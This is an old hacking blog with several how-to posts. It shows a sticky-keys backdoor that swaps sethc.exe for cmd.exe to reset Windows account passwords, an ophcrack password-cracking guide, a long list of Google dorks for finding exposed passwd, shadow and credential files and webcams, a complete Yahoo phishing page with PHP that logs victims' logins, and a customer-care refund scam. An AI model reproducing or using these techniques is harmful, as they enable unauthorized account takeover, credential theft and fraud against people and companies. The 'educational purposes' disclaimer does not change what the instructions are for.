Search This Blog

Page underconstruction..!!

Sorry Guys for not updating this page regularly due to some reasons. Page is undercontruction. Please wait patiently until the softwares get synchronized with the server...
More torrents and hack guides and tutorials are to be uploaded soon...

Monday, January 3, 2011

Sticky keys and Command Prompt Hack

Well this tutorial shows you how to hack any Admin account or any privilege account on any WINDOWS based operating system.

Press shift key 5times or more, you will see a sticky key option, this has a name as sethc.exe in the system32 folder of windows directory.

for this whole process we need administrative privilages to allow modifications in the system32 folder for windows vista or Windows 7 so inorder to gain that access remotely follow the parameters :

Steps to do this using Command Prompt :

1. Open command prompt with administrative privileges and type in the following :

cd\
c:\cd windows\system32
c:\windows\system32> takeown /f sethc.exe

(this command basically gives you the ownership to that particular file. Now we have to gain administrative privilege on that file to do that -)

c:\windows\system32> icacls sethc.exe /grant administrators: f

now do this again for cmd.exe file :

c:\windows\system32> takeown /f cmd.exe
c:\windows\system32> icacls cmd.exe /grant administrators: f

Now as we have control on both the files follow these :

1. Delete or rename sethc.exe with someother name.
2. Make a duplicate copy of cmd.exe file and then rename it with "sethc.exe" without quotes.
3. Now ensure that you have 2 copies of cmd.exe, one is the original cmd.exe file and the other which is    renamed as sethc.exe

Now when you press shift 5times or more you get a command prompt instead of a sticky key window prompt.

now you can use this command prompt to gain access to that computer as follows:

Now when you have replaced that duplicate cmd with sethc.exe command prompt will appear as soon as you  press the shift key 5times or more do this at the time of logon.

When the console asks you for the password press shift key 5times or more to get the command prompt.
Now type in the following :

net user <username> *                          (Press enter it will ask you for a password)

for example my username is Admin:

net user admin *
type a new password :
confirm password      :

fill it blank and you have reset the password of that account. Now type "exit" without quotes to get out of the command prompt and select the arrow button of windows vista/7 or press enter for windows xp to bypass the login screen.

Extreme users can use the above replacement of sethc.exe with cmd.exe without having to logged in to the computer. Nube skill users can use it in logged in computers.

Enjoy the hack and post the commands n do post a comment.

Friday, November 26, 2010

Hack Admin Account When logged On or Off






To hack Win 7 / Win Vista / Win Xp Admin password you need to download the OphCrack Live CD.
Guys who can't find its download link click here : OphCrack Live CD.

Once you download this file extract the contents as bootable file to a USB disk or write the contents of a file to a CD. OphCrack contains MD5 Decryption tables.
By default only xp free table is available with the above download. Rest you can download online through torrents. The other tables required for cracking account passwords are :

1. XP free small
2. XP free fast
3. XP special
4. Vista free
5. Vista Special

Note : Vista tables can be used to crack Admin Passwords. And its not necessary to download all the tables to carry out cracking procedure.

Now the major issue comes when the above tables are downloaded but how to copy them or store them. Well, its just easy when you run the live installation on a USB disk there is a folder named "table". Copy the tables you have downloaded and place them as it is with the same name in that folder.

Now when the installation to the USB is complete you are done.
Switch on any computer with first boot device as USB hard-disk and boot via USB.
SYSLINUX operating system gets started and then sit back and relax it will start the cracking process automatically.

Note : The password decryption time depends upon the strength of the passwords and may vary accordingly.









Case 2. When the Administrator account is already in an open state then just open the Run from Start Bar.

Type in : control userpasswords2
This command would open a dialog box showing the User Accounts. Select the user other than in which you are currently working and select RESET PASSWORD option.
It will never ask for an Old Password and type in the New Password and its done.


2nd Part : When the Administrator account is already in an open state then just open the Run from Start Bar.

Type in : cmd  (with adminstrative rights in Windows 7/ Windows Vista Run dialog box)
Type in : net user administrator * (and press enter)
              (computer asks for a new password. There you can specify your password and you are done).

This can be done with any user accounts even the one in which you are working. Just replace administrator with any user accounts name.

If you want to enable Administrator account :
In most of the computers the Administrator account is hidden or not active. So to make it active
Type in : cmd  (with adminstrative rights in Windows 7/ Windows Vista Run dialog box)
Type in : net user administrator active:y

Google Hacks

 GOOGLE - HACKS



Google hacks is nothing but the combination of several keywords to exactly get the required results. If you want to simply find an ebook for hacking then instead of typing hacking ebooks which would give a lot of links and other related websites just type :                               "hacking" filetype:pdf    (including " " in the google search bar).

This basically returns the pdf file list consisting of only hacking materials.
try to search google with this terms and see what you will find

 “Index of /admin”

 “Index of /” +.htaccess

 “Index of /mail”

 “Index of /” “Parent Directory” “WS_FTP.ini” filetype:ini

“Index of /” +passwd

“Index of /password”

 “Index of /” +password.txt


filetype:bak inurl:”htaccess|passwd|shadow|htusers”

filetype:conf slapd.conf

filetype:ctt “msn”

filetype:mdb inurl:”account|users|admin|administrators|passwd|password”

filetype:mdb inurl:users.mdb

filetype:QDF QDFfiletype:pdf “Host Vulnerability Summary Report” “Assessment Report”

filetype:sql (”passwd values ****” | “password values ****” | “pass values ****” )

filetype:xls inurl:”email.xls”

filetype:user eggdrop user

 intitle:”index of” .bash_history

? intitle:”index of” etc/shadow

? intitle:”index.of” finances.xls

? intitle:”index of” htpasswd

? intitle:”Index Of” inurl:maillog

? intitle:”index of” master.passwd
intitle:”index of” members OR accounts

intitle:”index.of” mystuff.xml

intitle:”index of” passwd

intitle:”index of” people.lst

intitle:”index of” pwd.db

 intitle:”Index of” pwd.db

 intitle:”Index of” .sh_history

 intitle:”index of” spwd

 intitle:”index.of” trillian.ini

 intitle:”index of” user_carts OR user_cart

 intitle:”active webcam page”

 intitle:”ASP Stats Generator *.*” “ASP Stats Generator” “2003-2004 weppos”

 intitle:”curriculum vitae” “phone * * *” “address *”

 intitle:”Dell Laser Printer” ews

 intitle:”EvoCam” inurl:”webcam.html”

 intitle:liveapplet inurl:LvAppl

 intitle:”Multimon UPS status page”

 intitle:”my webcamXP server!” inurl:”:8080?

 intitle:”statistics of” “advanced web statistics”

 intitle:”System Statistics” +”System and Network Information Center”

 intitle:”Terminal Services Web Connection”

 intitle:”Usage Statistics for” “Generated by Webalizer”

 intitle:”VNC Desktop” inurl:5800

 intitle:”Web Server Statistics for ****”



 inurl:admin filetype:db

 inurl:admin inurl:backup intitle:index.of

 inurl:”auth_user_file.txt”

 inurl:”/axs/ax-admin.pl” -script

 inurl:”/cricket/grapher.cgi”

 inurl:hp/device/this.LCDispatcher

 inurl:iisadmin

 inurl:indexFrame.shtml Axis

 inurl:”main.php” “phpMyAdmin” “running on”

 inurl:passwd filetype:txt

 inurl:”printer/main.html” intext:”settings”

 inurl:server-info “Apache Server Information”

 inurl:”ViewerFrame?Mode=”

 inurl:”wvdial.conf” intext:”password”

 inurl:”wwwroot/*.”



 site:gov confidential

 site:mil confidential

 site:mil “top secret”


You can replace the inside content of all the commands. But be sure you are writing it correctly.
Hope you enjoyed it.

Thursday, November 25, 2010

Phishing Site


This is only for educational purposes and not for any sort of exploit. Users are warned before using this. They will be held responsible for thier own act. Purpose of this blog is to teach you how to tackle the phishing sites and how they are managed by the owners of the phishing sites.

To create a phishing site first you must get yourself registered for free in http://www.t35.com. Get a website name. Once you are done then just follow simple step.

You need 3 files to complete this procedure :  (PHISHING YAHOO PAGE)

I. Yahoo page :

1. Yahoo mail (html or php file) : you can get this file by opening http://www.mail.yahoo.com. Right click anywhere on the page and select save as option and filename - yahoo.html.
2. When you save the file. Go to that location select the file and right click with the mouse and select open with -> Notepad.
3. When the webpage opens press Ctrl+F and type "action" without the quotes. Now when you get this action replace the contents infront of the action button as mail.php.

II. Mail.php page :

1. Open a notepad.
2. Paste the following as it is after the colon mark :
    <?php
header("Location: http://www.mail.yahoo.com");
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


3. Save this file as mail.php

III. Log file

1. Open a notepad and save it blank as log.txt

Now you are done. You have all the three files that is yahoo.html, mail.php, log.txt.

open up your members area in http://www.t35.com and upload these 3 files. And now you can access these three files from anywhere on the net.


Guys who have still difficulty understanding it or having problem creating or uploading files and opening accounts can further email their problems on : blizz56@live.com

Comments and suggestions are most welcome.

Wednesday, November 24, 2010

How to increase download speed of torrent via Bit Torrent, UTorrent, Vuze


Well, after a long time research I found out that the system blocks users to use the full bandwidth due to some restrictions on it.
Usually when you try to download file larger than 4gb from a torrent you get an average speed of about 60-70kbps for a 2Mbps connection. I prefer Vuze for downloading torrent files.

There are 2 high speed incoming ports on a system :
TCP  : 6881
UDP : 6889

you can configure this by following simple steps below :
1. Open Bit Torrent, U Torrent or Vuze.
2. Select Options -> Preferences or Configure
3. Select Connections and put the above port numbers in the required protocols listed.

you are done. Now you can enjoy downloading large files i.e more than 4gb with a download speed of 250kbps + with a 2mbps connection for a torrent file.

Airtel Hello Tune Hack


Guys this is not a hack exactly but its some facility the Airtel has provided to the users unknowingly. 

I.
the free dialer tune search no. is 543215(its free)
for eg.
kanthasamy to 543215
2nd method of search:
Dial *321# Or *121#
Then Select Hello Tunes Menu And Search Songs
3rd method hello tune search:
Now You Can Search And set Hello Tunes Inside Your Airtel Live Wapsite

Visit http://live.airtelworld.com and you will see menu’s for hello tunes and their codes.


II.
Gift a caller tune/ hello tune to any of your friend. Now when the caller tune gets installed on his phone and the money gets deducted from your account. Call the customer care.
Query him about the loss of money from the account without acknowledging him about the hello tune you purposely gifted to your friend. Ask him to refund the money as you were unaware about the gift.
These customer care agents are trained to refund back the money and as a reward they do not revert back the hello tune service from your friend's number. Its a guaranteed service.

Enjoy it...!!!